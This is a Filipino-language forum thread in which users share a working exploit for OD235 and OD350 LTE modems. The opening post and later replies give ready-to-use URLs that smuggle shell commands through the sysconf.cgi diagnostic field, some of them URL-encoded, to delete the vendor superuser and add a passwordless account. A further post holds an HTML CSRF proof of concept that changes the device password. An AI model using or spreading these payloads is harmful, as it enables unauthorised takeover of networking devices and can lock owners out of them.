Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

od235

Poldo

The Fanatic
Advanced Member
Messages
481
Reaction score
12
Points
43
Power Stone
Reality Stone
Soul Stone
Time Stone
eto na po steps

una, lagay nyo po ito sa URL

http://192.168.254.254/cgi-bin/sysc...ction=personalize_password&time=1434934507727

may lalabas po jan na kagaya neto

Successfully,u878mJAskqMd,Admin,user,enable,enable,enable,/www/power_user,/www/operator_user,/www/guest_user,

kapag nagamit nyo na po ang tool, pwedeng maging ganito lang results nyo sa paggamit ng unang url

Successfully,,Admin,user,enable,enable,enable,/www/power_user,/www/operator_user,/www/guest_user,

nadelete ang superuser pero hindi naset ng maayos si mediatek

merong tatlong url or exploit na nirrun sa tool

http://192.168.254.254/cgi-bin/sysc...0&mon_diag_addr=1+&+/bin/deluser u878mJAskqMd

-dinedelete nya si superuser na u878mJAskqMd
-/bin/deluser u878mJAskqMd

http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

-eto parang submit or commit function..

http://192.168.254.254/cgi-bin/sysc...ype=0&mon_diag_addr=1+&+/bin/adduser mediatek

-eto nagseset sya ng new superuser account
-/bin/adduser mediatek

hanggang dyan lang ang tool. kailangan isa pang run ng submit/commit function. eto yun:

http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

after nyan, check nyo nlng kung pumasok ang naadd nyo na user by using this:

http://192.168.254.254/cgi-bin/sysc...ction=personalize_password&time=1434934507727

dapat magdidisplay ang nilagay nyong user sa script, dito sa case na dito, mediatek, kayo na bahala mag modify ng URL para sa gusto nyong username.
ang password po ay blank
 
Last edited:
salamat ts ,sana may mag share na about sa exploit
 
Sa wakas napagana ko na rin sya. hehe. ganun lang pala yun. naiba ko na rin default username instead of mediatek. kulang nga ng isang step yung ginagawa nung cracked tool. ahehe.
 
panu po ung step

- - - Updated - - -

Sa wakas napagana ko na rin sya. hehe. ganun lang pala yun. naiba ko na rin default username instead of mediatek. kulang nga ng isang step yung ginagawa nung cracked tool. ahehe.

panu po ung step by step
kc po di po ako mkpag access ehh
di rin po gumagna ung mediatek
 
nakita kong commands sa OD350 tool crack

wala akong OD350 kaya di ko alam kung yan na or kulang yang commads na yan :noidea:

192.168.15.1/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

192.168.15.1/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+%2f%64%65%6c%2f%75%73%65%72%20%67%70%24%75%70%65%72%75%73%65%72


OD235 commands
192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

192.168.154.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+%2f%62%69%6e%2f%61%64%64%75%73%65%72%20%6d%65%64%69%61%74%65%6b
 
Last edited:
sana pati ung sa od350 :)

boss ask ko lang kaya ba ng od350 yung babad tricks sa smart LTE sim?
yung tipong di mawawala yung signal ng LTE pag naexpired na yung LTE promo. ung tipong makikita ko pa si safezone.
 
anu po ba kulang?
 

Attachments

  • ewan ko ba.jpg
    ewan ko ba.jpg
    264.4 KB · Views: 326
boss ask ko lang kaya ba ng od350 yung babad tricks sa smart LTE sim?
yung tipong di mawawala yung signal ng LTE pag naexpired na yung LTE promo. ung tipong makikita ko pa si safezone.

Gamit ka pinksim

- - - Updated - - -

nakita kong commands sa OD350 tool crack

wala akong OD350 kaya di ko alam kung yan na or kulang yang commads na yan :noidea:

192.168.15.1/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1

192.168.15.1/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+%2f%64%65%6c%2f%75%73%65%72%20%67%70%24%75%70%65%72%75%73%65%72


OD235 commands
192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1

192.168.154.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+%2f%62%69%6e%2f%61%64%64%75%73%65%72%20%6d%65%64%69%61%74%65%6b
Working ba yan sa od235?
 
boss panu po ung step by step kc di ko parin mapasok ehh ayaw din ng mediatek at kulang kc ung step na nakuha ko
 
inupdate ko po 1st page. goodluck po sa inyo.
 
ayos ka ts galing mo sinagad muna ang tut :salute: maraming salamat
 
Last edited:
<html>
<!-- CSRF PoC --->
<body>
<form action="http://192.168.254.254/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
<input type="hidden" name="PasswdEnable" value="on" />
<input type="hidden" name="New_Passwd" value="test" />
<input type="hidden" name="Confirm_New_Passwd" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
 
TS salamat d2 . .

ang tanong nlng Paano makakabasa ng ibang sim si OD235. .?
 
hindi mapalitan mac :(
wala authentication security...
waaaaaaaaaaaaaaaaaaa
 
hindi mapalitan mac :(
wala authentication security...
waaaaaaaaaaaaaaaaaaa


Nakapasok ka tol? Akin parehas kami error ng post sa taas mo. In use daw si mediatek. bakit kaya... OD235 user ako.
 
Back
Top Bottom